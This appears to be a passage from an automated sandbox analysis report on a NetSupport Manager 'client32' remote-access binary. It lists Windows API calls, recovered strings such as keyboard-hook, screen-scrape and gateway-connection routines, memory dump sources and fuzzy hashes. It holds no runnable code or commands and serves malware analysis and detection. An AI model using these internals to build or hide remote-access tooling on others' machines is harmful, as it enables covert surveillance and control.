                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                  • API String ID: 3464732724-3340099623
                                                                                  • Opcode ID: 91cffe1c61f549a3eebd687e18f2deb194647469c240190c43c6c0c2cbc8add3
                                                                                  • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                  • Opcode Fuzzy Hash: 91cffe1c61f549a3eebd687e18f2deb194647469c240190c43c6c0c2cbc8add3
                                                                                  • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced; root block 1102e199 (function body 1102e190-1102e93a, calls LoadLibraryA, GetProcAddress, GetComputerNameA, GetCurrentProcessId, CharUpperA, wsprintfA, FreeLibrary), raw edge list omitted
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: $18/11/16 11:28:14 V12.10F20$648351$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                  • API String ID: 1029625771-2135129619
                                                                                  • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                  • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                  • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                  • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced; root block 11142010-11142051 (function body through 111423fa, calls LoadLibraryA, FreeLibrary, GetClassInfoExA, LoadCursorA, GetStockObject, RegisterClassExA, GetProcAddress, SetTimer), raw edge list omitted
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                  • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                  • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                  • _memset.LIBCMT ref: 11142169
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                  • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                  • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                  • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                  • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                  • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                  • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                  • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                    • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,50D94AA1,11030346,00000000), ref: 11017A6E
                                                                                    • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                    • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                    • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                    • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                    • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                  • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                  • API String ID: 3706574701-3145203681
                                                                                  • Opcode ID: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
                                                                                  • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                  • Opcode Fuzzy Hash: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
                                                                                  • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                                  Control-flow Graph
                                                                                  • Rendered graph not reproduced; root block 6f9f63c0-6f9f6402 (function body through 6f9f6608, calls EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, GetProcAddress, SetLastError, GetLastError, shutdown, closesocket, WSAGetLastError, timeGetTime, Sleep), raw edge list omitted
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F63E8
                                                                                  • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6F9F63FA
                                                                                  • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6412
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6F9F643B
                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6450
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6F9F646F
                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6484
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6F9F64A3
                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6F9FD77B,00000000), ref: 6F9F64C5
                                                                                  • shutdown.WSOCK32(?,00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F64E9
                                                                                  • GetLastError.KERNEL32(?,00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F64F2
                                                                                  • timeGetTime.WINMM(?,00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6510
                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6526
                                                                                  • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6533
                                                                                  • timeGetTime.WINMM(?,00000000,?,6F9FD77B,00000000), ref: 6F9F6540
                                                                                  • Sleep.KERNEL32(00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F654B
                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6563
                                                                                  • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6574
                                                                                  • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F657D
                                                                                  • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F658E
                                                                                  • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F659E
                                                                                  • _memset.LIBCMT ref: 6F9F65C8
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,6F9FD77B,00000000), ref: 6F9F65D7
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898,?,00000000,?,6F9FD77B,00000000), ref: 6F9F65F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                  • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                  • API String ID: 3764039262-2631155478
                                                                                  • Opcode ID: b27a09814b850aecd8f2672e3603a9400b50eb143fa32efd89faf24cafc7cda6
                                                                                  • Instruction ID: ddfc4d94d3366bff88e246e873f5fdb418dacab722b002aae8d9f0365d0e3629
                                                                                  • Opcode Fuzzy Hash: b27a09814b850aecd8f2672e3603a9400b50eb143fa32efd89faf24cafc7cda6
                                                                                  • Instruction Fuzzy Hash: A951B0736047009FDB20EF68CD84B5673B9BF8A328F118114E909E72C4EB75E896CB61

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strncmp
                                                                                  • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                  • API String ID: 909875538-2848211065
                                                                                  • Opcode ID: 46c56d4116edf4e34ee621750845c7a309e160f0843e52fe74b7f83b33708654
                                                                                  • Instruction ID: 86cbfce4d3bcf3f728a0d43727a0faea78ed61e42a93a488509f18b3f9110653
                                                                                  • Opcode Fuzzy Hash: 46c56d4116edf4e34ee621750845c7a309e160f0843e52fe74b7f83b33708654
                                                                                  • Instruction Fuzzy Hash: 49D1D671E052199FDB20CF68CC81BD9B7B9AF1A318F0481DAD80D9B285D735E986CF51

                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73F51370,?,0000001A), ref: 11028CFD
                                                                                  • _strrchr.LIBCMT ref: 11028D0C
                                                                                    • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileModuleName__stricmp_l_strrchr
                                                                                  • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                  • API String ID: 1609618855-357498123
                                                                                  • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                  • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                  • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                  • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06BD5
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06C26
                                                                                  • Sleep.KERNEL32(00000064), ref: 6FA06C5B
                                                                                    • Part of subcall function 6FA06940: GetTickCount.KERNEL32 ref: 6FA06950
                                                                                  • WaitForSingleObject.KERNEL32(000002E8,?), ref: 6FA06C7C
                                                                                  • _memmove.LIBCMT ref: 6FA06C93
                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6FA06CB4
                                                                                  • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6FA06CD9
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06CEC
                                                                                  • _calloc.LIBCMT ref: 6FA06D76
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06DF3
                                                                                  • InterlockedExchange.KERNEL32(03022FE2,00000000), ref: 6FA06E01
                                                                                  • _calloc.LIBCMT ref: 6FA06E33
                                                                                  • _memmove.LIBCMT ref: 6FA06E47
                                                                                  • InterlockedDecrement.KERNEL32(03022F8A), ref: 6FA06EC3
                                                                                  • SetEvent.KERNEL32(000002EC), ref: 6FA06ECF
                                                                                  • _memmove.LIBCMT ref: 6FA06EF4
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06F4F
                                                                                  • InterlockedExchange.KERNEL32(03022F2A,-6FA3A188), ref: 6FA06F60
                                                                                  Strings
                                                                                  • ReadMessage returned FALSE. Terminating connection, xrefs: 6FA06F3A
                                                                                  • httprecv, xrefs: 6FA06BDD
                                                                                  • ProcessMessage returned FALSE. Terminating connection, xrefs: 6FA06F25
                                                                                  • ResumeTimeout, xrefs: 6FA06BBA
                                                                                  • FALSE, xrefs: 6FA06E67
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6FA06E62
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                  • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                  • API String ID: 1449423504-919941520
                                                                                  • Opcode ID: 76397750fdb577a37c5ad635268b8b29929ec82147da63a841a48431eba31dfd
                                                                                  • Instruction ID: 78fa0b8020ebdf2d59f63a49e052932926e585954efdd68a6bb47c3fe53fe5d8
                                                                                  • Opcode Fuzzy Hash: 76397750fdb577a37c5ad635268b8b29929ec82147da63a841a48431eba31dfd
                                                                                  • Instruction Fuzzy Hash: ADB1C672D007689BDB20DF24ED44BD973B4AF4635CF048196E549E6380D7B8AAC5CFA1
APIs
• RegOpenKeyExA.KERNEL32 ref: 11030F12
• RegCloseKey.KERNEL32(?), ref: 11031037
  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
• GetStockObject.GDI32(0000000D), ref: 110312E6
• GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
• InterlockedExchange.KERNEL32(02648DF0,00001388), ref: 110313BA
• GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
• String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
• API String ID: 1620732580-3468083601
APIs
• LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
• LoadLibraryA.KERNEL32(?), ref: 11086ABC
• GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
• GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
• GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
• GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
• GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
• GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$FileModuleName
• String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
• API String ID: 2201880244-3035937465
APIs
• RegCloseKey.ADVAPI32(00000000), ref: 111424BA
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Close
• String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 3535843008-1834795898
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
• InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
• InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
• InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
• InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
• InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
• _strncpy.LIBCMT ref: 11074E38
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
• CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
• SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
• std::exception::exception.LIBCMT ref: 11075038
• __CxxThrowException@8.LIBCMT ref: 11075053
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
• String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
• API String ID: 703120326-1497550179
APIs
  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
• PostMessageA.USER32(0006040E,000006CF,00000007,00000000), ref: 11139C4F
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• SetWindowTextA.USER32(0006040E,00000000), ref: 11139CF7
• IsWindowVisible.USER32(0006040E), ref: 11139DBC
• GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
• IsWindowVisible.USER32(0006040E), ref: 11139DEA
• SetForegroundWindow.USER32(00000000), ref: 11139E18
• EnableWindow.USER32(0006040E,00000001), ref: 11139E27
• IsWindowVisible.USER32(0006040E), ref: 11139E78
• IsWindowVisible.USER32(0006040E), ref: 11139E85
• EnableWindow.USER32(0006040E,00000000), ref: 11139E99
• EnableWindow.USER32(0006040E,00000000), ref: 11139DFF
  • Part of subcall function 11132120: ShowWindow.USER32(0006040E,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
• EnableWindow.USER32(0006040E,00000001), ref: 11139EAD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
• String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
• API String ID: 3453649892-3803836183
APIs
• wsprintfA.USER32 ref: 11030645
• PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostwsprintf
                                                                                  • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                                  • API String ID: 875889313-3431570279
                                                                                  • Opcode ID: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
                                                                                  • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                                  • Opcode Fuzzy Hash: 2b61c38f017bed57c92655f0d7e560a34b8dc01c16e3a6b7c0ac1e0e1303e311
                                                                                  • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                                  APIs
                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                                  • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                  • InterlockedExchange.KERNEL32(02648DF0,00001388), ref: 110313BA
                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
